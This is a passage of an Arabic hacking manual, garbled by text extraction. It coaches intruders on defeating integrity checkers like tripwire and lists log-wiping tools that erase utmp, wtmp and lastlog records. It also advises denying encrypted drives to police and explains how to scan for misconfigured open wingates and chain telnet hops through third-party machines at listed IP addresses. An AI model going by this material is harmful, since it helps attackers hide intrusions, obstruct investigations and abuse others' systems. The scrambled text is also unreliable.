.‬للتحقق اللسريع من‬ ‫الموضوع نستخدم المر التالي‬ ‫"‪.‬قم بفحص ملفات ‪."crontab -l root‬‬ ‫غالبا ماتكون هذه الدوات محمله و عامله على حساب المدير‪ .‬‬‫‪wheel.‬قد يفيدك هذا‬ ‫في معرفه دور المدير على الموقع‪ .

.‬‬ ‫ولكن يمكنك القيام بعملية فحص استطلعي سريع لمعرفة البرامج المستخدمة ‪ ،‬واذا لم تستخدم ففرصتك‪،‬‬ ‫واذا لم تجد شي ولكنك كنت متاكدا من استخدامهم لتلك النواع من البرامج هذا يعني ان الموقع او المزود‬ ‫محمي بشكل جيدا ) هارد لك ( ويجب ان ل تعبث بالملفات ابدا ‪. ..1‬ايهام تلك البرنامج بطرق شرعي بانه تم تغيير ملف ما بشكل قانوني ويتم تحديث قواعد البيانات‬ ‫مثل "‪.‬‬ ‫لذا فعليك عدم القيام باي اتصالت فيها اخبار اخترقاتك ‪ ..login...‬سيقومو مباشرة بمراقبة بريدك اللكتروني و ملفاتك و ان كان محترف الدمين‬ ‫سيرصدك ايضا هجماتك الخرى ‪..cshrc.‬‬ ‫الخ ) اي الملفات التي تبدا بنقطه (‬ ‫الجزء الخامس ‪:‬‬ ‫=========‬ ‫ماذا تفعل ان وضعت تحت المراقبه؟‬ ‫***************************‬ ‫متى اصحبت تحت الميكروسكوب ) المراقبه ( من قبل الشرطه او حتى ال ‪ administrators‬عليك القيام‬ ‫بخطوات هامه و سريعه حتى ليستطيعو المساك بدليل ) برهان ( عليك‬ ‫ ملحوظه ‪ :‬ان كان في اعتقاد ال ‪ administrators‬انك ‪ hacker‬فانت ==< مذنب حتى تثبت‬‫براته ‪.‬‬ ‫ليعني القانون اي شئ لل ‪ ) admins‬بعض الوقات اعتقد انه ل يوجد فرق بين ال ‪ hacker‬و ال‬ ‫‪ administrator‬ال بان مالك الكومبيوتر هو ال ‪ administrator‬فقط ( عندما يعتقدون انك هاكر فانك‬ ‫فورا اصبحت مذنب ‪ . ..logout . /usr/local/adm/tcheck : databases..‬و ان حتى اردت ان تحذر اصحابك فل تخبرهم‬ ‫هاتفيا او ببريد الكتروني ) ال اذا كان مشفرا( و من الفضل ان تخبرهم عندما تقابلهم وجها لوجه ‪ ."tripwire -update /bin/target‬‬ ‫‪ . .2‬يمكنك تغيير قائمة الملفات التي يجب فحصها وتزيل اسم الملفات المراد من القائمة فل يتم فحصها مرة‬ ‫اخري للتحقق ) ولكن يجب ان تتاكد ايضا ان ملف قواعد البيانات نفسها ل يتم فحصها ب ‪checksum‬‬ ‫حتي ل يتم اكتشاف التغييرات التي قمت بها (‬ ‫ حيل المستخدم المنيه‬‫*******************‬ ‫هذه الحيل ما ندر توجد او تستخدم لكنني كتبتها فقط لكون شملت كل شئ ) لكمال الموضوع ( ‪ ... tripwire‬‬ ‫‪binaudit : /usr/local/adm/audit : auditscan‬‬ ‫‪hobgoblin : ~user/bin : hobgoblin‬‬ ‫‪raudit : ~user/bin : raudit.‬فبعض‬ ‫المستخدمين يسمون اشتراكاتهم ‪ admins‬و بالطبع ل يريدون ان يعبث في ملفاتهم اي شخص فيقومون‬ ‫بعمل بعض الحيل في ملفات ال ‪ startup‬لذا فدائما تحقق من ‪profile.‬و‬ ‫تمنعهم من راسال اي رسائل غيير عاديه ‪.‬‬ ‫اذا كان يمكنهم مراقبة كل هذه التصالت اكيد ببساطه يمكنهم مراقبة خط تيليفونك ‪..‬‬ ‫ولكن ماالعمل اذا اكتشفت انهم يستخدمون تلك البرامج وبامكانك تغييرها؟؟‬ ‫يمكنك ‪ .‬و ال ستواجه مشاكل اعتقد انك‬ ‫‪85‬‬ .pl‬‬ ‫‪l5 : compile directory : l5‬‬ ‫كما تري هناك احتمالت كثيرة‪ ،‬ربما البرنامج نفسه او قواعد البيانات يوجد علي جزء آخر‪ ،‬مثل جزء‬ ‫‪ NTFS‬لمضيف او جهاز آخر ‪ ،‬او حتي قواعد بيانات التي تحمل معلومات ‪ checksum‬في جهاز محمي‬ ‫علي الكتابة ) اقراص ‪ CD‬مثل ( ‪..‬‬ ‫لتؤمن نفسك عليك ان تبقى على هذا الحال على القل من شهر الى شهرين ‪ ..‫‪SOFTWARE : STANDARD PATH : BINARY FILENAMES‬‬ ‫‪tripwire : /usr/adm/tcheck.

c Deletes entries in wtmp‬‬ ‫‪!zap.‫لترغب بها‬ ‫الجزء السادس ‪:‬‬ ‫=========‬ ‫ما الذي عليك القيام به و ايضا الذي لبد من عدم القيام به في حالة انه تم القبض عليك‪:‬‬ ‫**************************************************‬ ‫**************‬ ‫اول ‪ :‬اطلب محاميك فورا !!!! ‪ :‬ل تحاول بان تتذكى انت و ترد على التحقيق بمفردك ‪ ..c Changes the entries in utmp.just Overwrites the entries with zero-value bytes‬‬ ‫‪!Don't use such software (f. wtmp. wtmp and lastlog‬‬ ‫‪invisible.it can be detected‬‬ ‫‪--------------------------------------------------------------‬‬‫‪LOG MODIFIER‬‬ ‫‪++++++++++‬‬ ‫‪ah-1_0b. cuts out the entries you want‬‬ ‫‪Edit .‬انما ايضا بدخول اصحابك في الموضوع ستتسع‬ ‫دائرة الموضوع و من ثم تزيد المعلومات عنك و عن جرائمك و هم ايضا !‬ ‫بعض الدول من ضمن قانونها انه اذا لم تستطع الشرطه فك تشفير ملفاتك او جزء من الهارد ديسك فيمكنك‬ ‫بمنتهى الحريه عدم الفصاح عنها‬ ‫لكن بعض الدول الخرى في قانونها انه مادامت وقعت في المصيده لبد ان تدلي لهم بكل شئ في هذه الحاله‬ ‫انصحك باستشارة محاميك و انكار انك لديك اي اقراص صلبه مشفره‬ ‫الجزء السابع ‪:‬‬ ‫========‬ ‫قائمه بافضل البرامج للتخفي و الختباء ‪:‬‬ ‫******************************‬ ‫‪Change ..‬بعدها غالبا ما سيطلب‬ ‫المحامي جهازك ) الكومبيوتر ( باقصى سرعه بحجة احتياجه في العمل و ال عليهم تحميل جميع العباء‬ ‫الماديه و المشاكل التي قد تحدث عن عدك استخدام الجهاز ‪ .‬لذا فانه من العملي جدا ان يكون عندك محامي‬ ‫جاهز في اي وقت قبل ان تقع الفاس في الراس و بعدها تبدا في البحث و التدوير‬ ‫ثانيا ‪ :‬ابدا ل تتكلم ال الشرطه !!! ‪ :‬لتعطي للشرطه اي معلومات عنك او عن زملئك بحجة ان هذا سيخفف‬ ‫العقاب عنك و سيخرجك من المازق ‪ .‬فاطلب محاميك كي‬ ‫يدافع عنك هو و يطلعك على ما يجب ان تذكره و ما يجب ان ل تذكره نهائيا ‪ .‬و ان كان يجب استجوابك فاطلب‬ ‫ان يتم هذا فقط من خلل محاميك ) و هذا ايضا حق من حقوقك (‬ ‫لتخبر ابدا عن اصدقاؤك ليس ققط كنوع من الشهامه ‪ .c Deletes entries in wtmp‬‬ ‫‪wtmped. Watch out. wtmp and lastlog with predefines values. wtmp.best‬‬ ‫‪wzap.c Overwrites utmp. lastlog and wtmpx‬‬ ‫‪cloak2.‬لن هذا لن يفيدك بل سيدينك اكثر ‪ . there are numerous inv*.c Edit utmp.c‬‬ ‫‪!marryv11..Changes fields of the logfile to anything you want‬‬ ‫‪Delete .e. lastlog and accounting data .real Editor for the logfile‬‬ ‫‪..c Overwrites utmp. lastlog . wtmp.c Deletes entries in utmp.Don't use! Can be detected‬‬ ‫‪-------------------------------------------------------------------------------------‬‬‫الجزء الثامن ‪:‬‬ ‫=========‬ ‫كلمه ختاميه‬ ‫**********‬ ‫‪86‬‬ . zap) ..Overwrite .Deletes. so‬‬ ‫‪! it's better than zap.tar Changes the entries of accounting information‬‬ ‫‪clear..

Sock Host ..Wingate‬‬ ‫)وكيفية استخدامهم للزيادة من صعوبة الكشف عن هويتك في النت(‪-‬‬‫مع أدوات بسيطة أيضا تساعدك في التخفي‬ ‫‪87‬‬ .‬اعرف في من تثق و من ل !!‬ ‫لتفكر في نفسك فقط )انما ايضا تذكر كل من حولك (‬ ‫تمنياتي للجميع بحياة ممتعه و امنه ‪..‫لتدعهم ابدا يقبضون عليك ‪ .‬‬ ‫انتهى‪،،،‬‬ ‫" كيف تبقى مجهول الهوية في النت )الجزء الول(؟؟ "‬ ‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫>ةةةةةة‪ :‬ةةةةةة<‬ ‫في هذا الموضوع سوف أقوم بتعليمكم‬ ‫ماهو؟‬ ‫‪Proxy ..‬دائما اجعل عيناك مفتوحان ‪ .

‫‪++++++++++++++++++++++++++++++++++‬‬ ‫‪Introduction to Proxy Server‬‬ ‫=)الدخول إلى ‪ proxy server‬أي‪:‬خادم الوكيل(=‬ ‫‪) proxy server‬خادم الوكيل( هو خادم ‪ server‬ليقوم أحدا ما بتنزيله على نظامه للتصال مع المواقع‬ ‫أو أي جهاز على النترنت مايفعله أول هو التصال بخادم الوكيل ‪proxy server‬‬ ‫لكنه غير إجباري لكن غالبا مايستخدم في الشبكات‬ ‫مثل‪LAN:‬‬ ‫‪Local Area Network‬‬ ‫شبكة إنترنت محلية عند اتصالك بالنترنت خلل ‪ proxy server‬جميع اتصالتك سوف تذهب إلى هذا‬ ‫البروكسي المستخدم أول وقبل كل شيء ثم تتوزع على الجهزة التي تريد أن تعمل إتصال بها كمثال‬ ‫إذا أردت أن تتصل بالنترنت من خلل استخدام ‪ proxy server‬وتريد أن تتصفح وتفتح موقعا كهذا‬ ‫‪/http://hackergurus.tk‬‬ ‫إلى الخادم ‪ server‬الموقع ومن ثم تحميلها وتخزينها في حسابها بعد ذلك سوف تمدك وتعطيك الصفحة‬ ‫أي‪:‬تستعرضها‪..‬‬ ‫وأيضا ياأخواني الوقت مهم مثل اذا الواحد استعرض صفحة ببروكسي من قبل ‪ 10‬أيام وانت استخدمت نفس‬ ‫البروكسي واسعرضت نفس الصفحة غير اذا عرضها في يومين لن ‪ proxy server‬يقدم المواقع الحديثة‬ ‫على القديمة علشان كذا أحيانا تلحظ تأخر في البروكسيات كل ماعليك عمل ‪ Refresh‬أو ‪Reload‬‬ ‫‪Why use a Proxy Server‬‬ ‫=)لماذا نستمعل البروكسي سيرفر؟(=‬ ‫وانا راح اجاوب على الخوان الي يسئلوني مادام خادم البروكسي يقوم بعملية إبطاء التحميل والتقليل من‬ ‫السرعة إذا مالدافع لستخدامه ؟!!!‬ ‫الجواب‪:‬هو أن مزودين خدمة النترنت‬ ‫‪ISP‬‬ ‫‪Internet Service Provider‬‬ ‫يقومون بالتحديد وبوضعك في قفص وهو عدم السماح لستعراض وتحميل الصفحات إل التي تم الموافقة‬ ‫عليها من قبل مزود الخدمة ويقومون بتقليل المواقع للحفاظ على ‪ Traffic‬الخاص بهم لتوفير السرعة في‬ ‫استخدام البروكسي لمشتركينهم‬ ‫أما ‪ proxy server‬سوف يجعل لك الحرية الكاملة في استعراض أي موقع مهما كان وسبب آخر‬ ‫للبروكسي وهو للحفاظ أو للزيادة من بقائك مجهول أثناء قيامك بأي عملية من عمليات التصال يعني لو‬ ‫استخدمت بروكسي راح يصعب على خادم الموقع اصطيادك وذلك لنه يأخذ ‪ ip‬الذي اتصل الموقع من خلله‬ ‫وهو ‪ ip‬البروكسي وهو الذي يتصل مع خادم الموقع‬ ‫وأيضا تستطيع الزيادة من صعوبة محاولة السقاط بك وذلك باستخدام عدة بروكسيات ذات منافذ مختلفة لكن‬ ‫أعلم أن هذا سوف يقوم بتقليل من سرعة التصال لذلك حاول ان تستخدم‬ ‫‪ proxy‬و ‪ port‬قريبين إلى منطقتك التي تعيش فيها حتى يكون ‪ proxy server‬قريب وبذلك سوف‬ ‫‪88‬‬ .tk‬‬ ‫عليك أول بالطلب من هذا ‪ proxy server‬ثم يقوم ‪ proxy server‬بطلب الصفحة‬ ‫‪/http://hackergurus..‬‬ ‫أليست هذه العملية تأخذ ‪ bit‬بسيط في وقت أطول مقارنة بالتصال المباشر )العادي( الذي يكلفك فقط بطلب‬ ‫الصفحة من خادم الموقع ومن ثم جاري تحميلها بسهولة واستعراضها‬ ‫لكن مع استعمالك للبروكسي سيرفر سوف يصبح اتصالك بالنترنت بطيء مقارنة مع التصال المباشر وذلك‬ ‫لن كل صفحة تقوم بتحميلها أي تستعرضها تذهب إلى خادم البروكسي أي ‪ proxey server‬وهذا يثقل‬ ‫عملية التصفح‬ ‫وهناك حالة وحدة وقد تصبح ‪ lucky‬بعض الحيان قل كيف‬ ‫إذا الشخص قام باستخدام نفس البروكسي واستعرض نفس الصفحات وانت استخدمت البروكسي الي‬ ‫استخدمه هذا الشخص واستعرضت الصفحة الي استعرضها راح يصبح البروكسي سريع ليه؟!‬ ‫لن الشخص الول الي قام باستخدام البروكسي وعرض الصفحات الصفحة حملت إلى ‪ proxy server‬فما‬ ‫بالك إذا كان لديك نفس البروكسي وحبيت تسعرض نفس الصفحة سوف يكون سريع لن الصفحة‬ ‫‪ download‬جاهزة فهمت ‪#..

23‬في الحقيقة‬ ‫هو اتصال ‪. xDSL.com‬‬ ‫‪89‬‬ .‬الشيء الثاني أقترح عليك تستخدم برامج‬ ‫‪WinGate Scanner‬‬ ‫هنالك العديد منها بالنت ابحث فقط في ‪google‬‬ ‫‪/http://www.‬بدل من تحديد‬ ‫المدخل للناس من ‪) Local Network‬الشبكة المحلية(‬ ‫وفتح الطريق لي شيئ من ‪ ipspoof‬في ‪ ICQ . ISDN.google. satellite connection. cable modem.com‬بمنفذ ‪80‬‬ ‫وطبعا انت ماتصدق تلقي بروكسي بهذي المميزات‬ ‫‪ -1‬سريع التصفح‬ ‫‪ -2‬يفتح جميع المواقع‬ ‫‪ -3‬التحميل عالي جدا وقوي‬ ‫هل تعرف لماذا ؟‬ ‫لن أكثر المستخدمين حول العالم هذا البروكسي سيرفر وهذا خطير جدا‬ ‫لن هذا البروكسي سيرفر سوف يقوم بمعرفة جميع تحركاتك وحفظها في ملفات ‪Logs‬‬ ‫‪Introduction to Wingate‬‬ ‫=)الدخول أو الدخال إلى ‪=(Wingate‬‬ ‫كثيرا مانسمع عنه لكن هل نعرف معناه الحقيقي ؟‬ ‫ماهو ‪ WinGate‬؟‬ ‫هو ‪ proxy server firewall‬أي يفوق البروكسي وهو خادم بروكسي ذو حاجز ناري يحتوي على‬ ‫حزمة كبيرة وضخمة من البرامج المختصة بالحماية والتي تبقيك ‪) Anonymously‬مجهول الهوية(‬ ‫التي تقوم بالسماح بالمشاركة بفرد واحد أو بعدة من اتصالت النترنت بشركة كمبيوتر بالكامل‬ ‫اتصال النترنت يكون مشارك بواسطة ‪ WinGate‬تقريبا لعدة أنواع تشمل‪:‬‬ ‫‪------------------------------------------------------------------------------------------‬‬‫‪dial up modem..‬بإمكانك تاخذ عنوان ‪ wingate‬من أصدقائك إذا‬ ‫كان أحد عنده ‪ .‬‬ ‫تحذير للجميع إياكم ياأخوان أن تنخدعوا ببروكسيات مايكروسوفت مهما وضع لها من إعلن كأن يقول‬ ‫استخدم‬ ‫‪ cach. Telnet‬‬ ‫‪ the wingate‬سوف يجعل أي شخص على الشبكة دخول النترنت أو التصال به لمواقع أخرى ‪ .‬‬ ‫مثل ‪ wingate‬قد يطلق عليه ‪ open wingates‬وعادة تنتهي مدتها في بضعة أيام أو شهور حتى يقوم‬ ‫باكتشافه ‪) Admin‬المدير( وهذا راح يكون ‪ DIScover‬ياأخواني يعني مكشوف أو يتلقى شكاوي من‬ ‫سوء استخدام أو أعضاء غامضين !!!‬ ‫الفائدة الوحيدة للمديرين هي القدرة على وضع مستخدمين متعددين في نفس التصال لكن ياأخوان المشاكل‬ ‫تفوق الفوائد‬ ‫إذا أي شخص قام بتنزيل ‪ WinGate‬خاص به عليه الحذر بشدة ومعرفة ماهو يفعل ويتأكد من أنه موفق‬ ‫بشكل آمن وهنالك أخرى متعددة أكثر ‪ WinGate‬أمانا مثل برامج ‪SyGate‬‬ ‫في معظم الحالت ملفات ‪) Logs‬سجلت( الخاصة بالـ ‪ WinGate Server‬تحذف عادة بعد ‪ 48‬ساعة‬ ‫للعمال وأيضا للـ ‪) ISP's‬خاصة بالكبار(‬ ‫أي ليوجد حاجة أو موارد لتدوين كل شيء يصادف خادم ‪wingate‬‬ ‫‪How do I find Wingates‬‬ ‫=)كيف يمكنني الحصول على ‪WinGate‬؟(=‬ ‫أفضل طريقة للحصول على هذا الشيء هو كلمة بالفم ‪ .‬بصورة‬ ‫سيئة وفق بين ‪ wingate‬وعدم كفاءة ‪) Aminstrator‬المدير(‬ ‫وهنالك العديد من ‪ wingate‬والذي تجعل الشخاص على النترنت للتصال ببعضهم ‪ .Mirc‬إلى سوء استغلل الحجم ‪.microsoft. or even‬‬ ‫‪dedicated T1 circuits‬‬ ‫‪------------------------------------------------------------------------------------------‬‬‫‪wingate‬‬ ‫متشابه مع البروكسي سيرفر حيث يعمل اتصالت مع كومبيوتر لسيرفر آخر خلل المنفذ ‪ .‫تزداد السرعة وأحيانا تفوق سرعة البروكسي سرعة بروكسي الخاص بمزود الخدمة مارأيك!! ‪(.

‫كل ماعليك فعله هو وضع مدى ‪ ip‬او ‪ hostname‬ومن ثم البدء بالبحث‬ ‫مثل اقترح عليك البحث في بلد العالم الثالث أو الشرق الوسط وأفريقيا وأخيرا شبكة ‪ @home‬كلهم‬ ‫يتشابهون ولديهم صفات شائعة وهي‪:‬‬ ‫توفر ‪ wingates‬والذي وفق بصورة رديئة وعادة هناك ‪ wingate‬مفتوح قليل على ‪NetWork‬‬ ‫حقهم ‪..‬‬ ‫هذه الفقرات عن ‪ Chaining Proxies‬لبقاء حريتك وسريتك على النترنت وقت أطول أثناء اتصالك لكن‬ ‫لتظن ان هذا الموضوع كافي فكلما قرأت عن هذا الجانب سوف تصبح الشخص المجهول‬ ‫‪90‬‬ ....‬‬ ‫خلل ‪ Unix‬أفضل طريقة هي‪ :‬المحاولة والخطأ‬ ‫‪Trial and Error‬‬ ‫اتصل بالتلنت في ‪ wingate‬من المنفذ ‪23‬‬ ‫واذا لقيت اترك فراغ السم والباسوورد واذا دخلت راح تحصل واحد أيضا بإمكانك تجربة اسمك وكلمة سرك‬ ‫او تستخدم ميزة ‪) Guest‬الضيف( أو ‪Anonymously‬‬ ‫‪Introduction to Socks Host‬‬ ‫=)الدخول أو الدخال إلى ‪=(Socks Host‬‬ ‫‪ Socks Host‬تقريبا مثل ‪ WinGate‬لكن الختلف وهو ان السوكس يتصل من خلل المنفذ ‪1080‬‬ ‫وبإمكانك عمل العدادات عليها وهي تتوفر في المتصفح‬ ‫‪explorer and netscape‬‬ ‫وبإمكانك إضافة ‪Socks Host‬‬ ‫وهذه الطريقة تستخدم كثيرا في ‪ Mirc‬وتقوم بحمايتك وبإخفاء ‪ ip‬الخاص بك وتعمل كـ ‪FireWall‬‬ ‫**********************‬ ‫وهذه برامج مساعدة على بقائك مجهول الهوية‬ ‫**********************‬ ‫‪Ghost Surf‬‬ ‫‪$$$$$$$$$$$$$$$$$$$$$$‬‬ ‫‪Stealther‬‬ ‫‪------------------------------------------‬‬‫ابحثوا عن البرنامجين السابقين في النترنت‬ ‫‪-------------------------------------------‬‬‫لكن أعلم ياأخي الكريم أن وبكل مافعلت لن تصبح مجهول ‪%100‬‬ ‫انتهى‪،،،‬‬ ‫" كيف تبقى مجهول الهوية في النت)الجزء الثاني(؟؟ "‬ ‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫>ةةةةةة‪ :‬ةةةةةة<‬ ‫ألحين الموضوع هذا سوف يكون فيه تطبيق عملي وليس كالسابق‪.

com‬‬ ‫وقد تعرف هل عنوان ‪ Ip‬تغير أم ل !!! هذا بالنسبة للموقع الول أما الموقع الثاني فهو خاص لكشف‬ ‫البروكسيات واعطائك مستوياتها ‪..com:‬‬ ‫طريقة التسجيل‬ ‫قم بالدخول إلى حسابك وأرسل للجروب بهذه الطريقة‬ ‫في خانة الرسال إلى اكتب‬ ‫‪P_R_O_X_Y-subscriber@yahoogroups.org/anon_list.‬‬ ‫=========================‬ ‫*************************************‬ ‫&&&&&&&&&&&&&&‬ ‫‪proxy server‬‬ ‫&&&&&&&&&&&&&&‬ ‫هو خادم ‪ Proxy‬يقوم بالتصال بين ‪(WebSite.net‬‬ ‫أو‬ ‫‪/http://www.htm‬‬ ‫‪/http://tools.proxytester.com/proxy‬‬ ‫أو هنالك طريقة أفضل لكم وأنصحكم إنكم تسجلون بـ ‪ Group‬وهو يقوم بإرسال بروكسيات جديدة جدا‬ ‫وبمنافذ مختلفة‬ ‫الجروب‪P_R_O_X_Y@yahoogroups.etc):‬‬ ‫هذه البروكسيات تقوم بإرسال طلبات لكي يستقل او يستعرض المستخدم موقعا على النترنت البروكسي‬ ‫يرسل طلبك على النترنت لكي يطلب هذا الموقع وبعد ذلك سوف تدخل الموقع ببروكسي وهذا سوف يخزن‬ ‫في ‪Proxy Server‬‬ ‫كما قلنا في الموضوع السابق‪..rosinstrument..‬‬ ‫قبل أن تقرأ هذا الموضوع علي اول ان اقوم بإرشادك كيف تحصل على ‪ Proxy‬مع تحديثها من هذه‬ ‫المواقع‪:‬‬ ‫‪http://www.‫وأيضا سوف نتكلم عن ‪ Chaining wingates‬لتصبح مجهول على ‪Telnet‬‬ ‫‪)------------------------------------------‬‬‫من المعروف أن أغلبكم يستخدم ‪ proxy‬لخفاء ‪ ip‬الخاص به او ‪ Domain‬او قد يستخدم البروكسي لكي‬ ‫يجتاز المواقع المغلقة وأيضا لحماية هويته ‪.com‬‬ ‫وأرسل رسالة فارغة إليهم بعد ذلك سوف تتلقى رد مباشرة قم بعمل ‪Replay‬‬ ‫الن مبروك لقد سجلت بالجروب‬ ‫‪)------------------------------------------‬‬‫=========================‬ ‫أن لن أقوم بمساعدتك في كل عمل تقوم به تستطيع التأكد من أن‬ ‫البروكسي يعمل بالذهاب إلى ‪:‬‬ ‫‪/http://www..‬‬ ‫لكن عليك ان تتعلم كيف تستخدم ‪ Proxy‬ومن الفضل ان تعرف ماذا هو ‪ Ip Address‬و ‪Domain‬‬ ‫أول ‪.privacy.‬‬ ‫هذي توضح كيف تتصل عن طريق البروكسي بالموقع‬ ‫]‪[User]>>>>>[Proxy]>>>>>[Web Pages‬‬ ‫‪---------------‬‬‫‪Proxy Chaining‬‬ ‫‪91‬‬ .multiproxy.IRC Chat..

google.yahoo..com/http://www. ftp.‬‬ ‫‪---------------‬‬‫‪Browser Chaining‬‬ ‫‪---------------‬‬‫وهو استخدام البروكسي من متصفحك وانا سوف يكون حديثي فقط عن ‪ Internet Explorer‬لنه الكثر‬ ‫استخداما ‪----‬‬ ‫ألحين مثل عندنا بروكسي‬ ‫‪213. Unix server.com‬‬ ‫مثال آخر‬ ‫كإضافة علمة )‪ (/‬بين المواقع‬ ‫‪http://proxy1/http://proxy2:80/proxy3:80/http://www.234.234.anonymizer.magusnet.com/-_-http://proxy.com/-_-http://www. etc‬‬ ‫إذا ‪ Proxy chaining‬مطلب ضروري لكي يستخدمه أي هكر ليحفظ سريته اثناء الدخول إلى أي‬ ‫‪ server‬مثل ‪telnet.free.com/-‬‬‫‪http://www.124.23:80‬‬ ‫العنوان‪213... ftp server.destination.124.com‬‬ ‫‪ = proxy‬استبدله ببروكسي رقمي يكون أفضل لك ‪...server2.server1.23:‬‬ ‫‪92‬‬ .‬‬ ‫‪---------------‬‬‫‪HTTP Chaining‬‬ ‫‪---------------‬‬‫‪ HTTP chaining‬هي نفس طريقة ‪ Proxy‬ويمكنك عملها من مستعرضك وفي خانة ‪Address‬‬ ‫مثال‪:‬‬ ‫‪http://proxy..google.‫‪---------------‬‬‫معناها عدة بروكسيات وهذي طريقة فعالة جدا لكي تصبح مجهول الهوية حيث يمكنك ان تتصل بأكثر من‬ ‫بروكسي لكي تعرض موقع واحد‬ ‫مثال‪/‬‬ ‫]‪[User]>>>[Proxy1]>>>[Proxy2]>>>[Proxy3]>>>[Proxy4]>>>[Destination‬‬ ‫يوضح هذا المثال ان المستخدم اول عليه التصال بالبروكسي الول فالثاني فالثالث والرابع وأخيرا الهدف‬ ‫مما يسبب بطأ في التصال‬ ‫‪Destination = web page. or http‬‬ ‫‪ Chaining‬هي مهمة كما أقول لن تصبح مجهول ‪ %100‬لكن حاول بقدر المستطاع على ان ل تمسك‬ ‫ويطادونك مثل السمكة لكن البروكسيات المتعددة صعب ان يكشفها احدا لكن مثل حاولت تدخل على موقع بالـ‬ ‫‪ ftp‬راح يصطاد البروكسي بعد كذا لو كان معاه فلوس كان طلب من‬ ‫‪ Adminstrator‬ملفات ‪ Logs‬لكي يعرف المصدر والمصدر ايضا راح يكون ‪ proxy‬ههههههههه‬ ‫يعني على هذا المنوال إلى ان يصل الى المستخدم لذلك عملية ‪ Chaining Proxy‬عملية مفيدة جدا‬ ‫ويصعب احدهم المساك بك‬ ‫لكن ملفات ‪ Logs‬تنحذف في اوقات بعد الضغط على البروكسي لكي يصل الى الحد المسموح به من تحميل‬ ‫الملفات على البروكسي الخادم الي يحتوي على البروكسيات لذلك سوف تصبح ملفات ‪ Logs‬متجددة ‪.com‬‬ ‫حركة جميلة وجديدة )‪ (-_-‬لم ترونها مسبقا صحيح !!!‬ ‫وأيضا يمكننا استخدام ‪ Chaining‬مثل‪:‬‬ ‫_‪http://proxy.com‬‬ ‫او يمكننا وضع عناوين بروكسيات بمنافذها‬ ‫‪http://anon.

148.23:‬المنفذ‪ 80:‬وبعد كذا اضغط موافق و‬ ‫والحين نبغى نستخدم الستعراض المتعدد ‪Chaining Proixes‬‬ ‫بدال مانحط بروكسي واحد في العنوان نحط أكثر من واحد مثل كذا‪/‬‬ ‫‪Address: 213.54.234.23:80 121.124.134.67 Port: 80‬‬ ‫‪$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$‬‬ ‫&&&&&&&&&&&&&&‬ ‫‪Wingates‬‬ ‫&&&&&&&&&&&&&&‬ ‫‪ Wingate‬هو ‪ proxy server‬الذي ينزل في جهازه او جهازها ليسمح بالفرد او بعدة أفراد ليأخذون‬ ‫مقاعدهم بالمنفذ خلل ‪)) 23‬منفذ ‪ Telnet‬العادي ((‬ ‫بعض ‪ Wingates‬يسمحون لي شخص متصل ‪ online‬لكي يتصلون به مباشرة او في وقت قصير‬ ‫لتتعدى اليام لكن اعلم ان هذا ليس من القانون وهنالك خصائص للـ ‪ Admin‬تمنع من استخدام‬ ‫‪ wingate‬على جهازه هذا على حسب المدير هل يفهم في هذا المجال أم ل !!!!‬ ‫وهي عبارة عن ‪ ip‬أجهزة أو اسماء أجهزة تتصل من خللها على المنفذ ‪ 23‬بأداة ‪ Telnet‬أو يمكنك من‬ ‫عمل بحث ببرامج‬ ‫‪WinScan‬‬ ‫‪Wingate‬‬ ‫‪93‬‬ .124.‫المنفذ‪80:‬‬ ‫ألحين كيف نحطها بدال البروكسي الخاص بالـ ‪ ISP‬أي مزد خدمة النترنت‬ ‫نروح عند‬ ‫أدوات ‪Tools‬‬ ‫خيارات إنترنت ‪Internet Options‬‬ ‫بعدين اتصالت ‪Connections‬‬ ‫تختار التصال الي تدخل في النترنت بعدين‬ ‫إعدادات ‪Settings‬‬ ‫راح تجد‬ ‫‪) Address‬العنوان(‬ ‫‪) Port‬المنفذ(‬ ‫ونضعه بداله‬ ‫العنوان‪ 213.234.23:80 143.172.

65.119.130‬ومنفذه ‪23‬‬ ‫ويتم التصال به عن طريق ‪ Telnet‬مثل‪:‬‬ ‫‪C:\WINDOWS>telnet 61.133.166 23‬‬ ‫بعدين تقدر تكرر العملية اكثر من مرة ولكن مع تغيير العنوان يعني كذا‬ ‫‪Wingate> 213..133.119..99.45 23‬‬ ‫وأيضا اتصل مرة أخرى‬ ‫‪Wingate> 10.130 23‬‬ ‫لحظ وجود المسافات فمسافة زائدة او ناقصة قد تعثر خطوتك‬ ‫بعد كذا سوف تتصل بالوين جيت مثل هذا‬ ‫‪Wingate> 203...7 23‬‬ ‫‪94‬‬ .‫‪Download‬‬ ‫‪------------------------------‬‬‫‪Chaining Wingates Using Telnet‬‬ ‫‪------------------------------‬‬‫ألحين راح نستخدم عدة ‪ Wingate‬كالسابق والدوات التي نحتاجها‬ ‫هي فقط ‪ DoS‬وأداة ‪ Telnet‬لظن أن الجهزة سوف تخلو من أهم هذين الداتين إل نادرا ‪.173.212.207.‬‬ ‫جميع ‪ wingate‬تتصل عن طريق المنفذ ‪ 23‬لكن المنفذ ليس مهما لكني سوف أضيفها لكم لكي تتعلموا‬ ‫فقط كيف يتم التصال بالـ ‪ Telnet‬عن طريق المنافذ‬ ‫وهذا عنوان جهاز امكننا إحضاره‬ ‫هو ‪ 61.17.

166 23 Wingate>135.18.org.133.org Connecting to host arbornet.Connected ،،،‫انتهى‬ 95 ..245.173.167 23 Wingate>m-net.119.130 23 Wingate>203.‫ اتصل بالموقع‬wingate ‫ألحين بعد ماتتصل بأكثر من‬ WinGate>arbornet.org ‫اذا الطريقة وبخطوة سريعة تبدو كذلك‬ C:\Windows> telnet 61..arbornet.207.

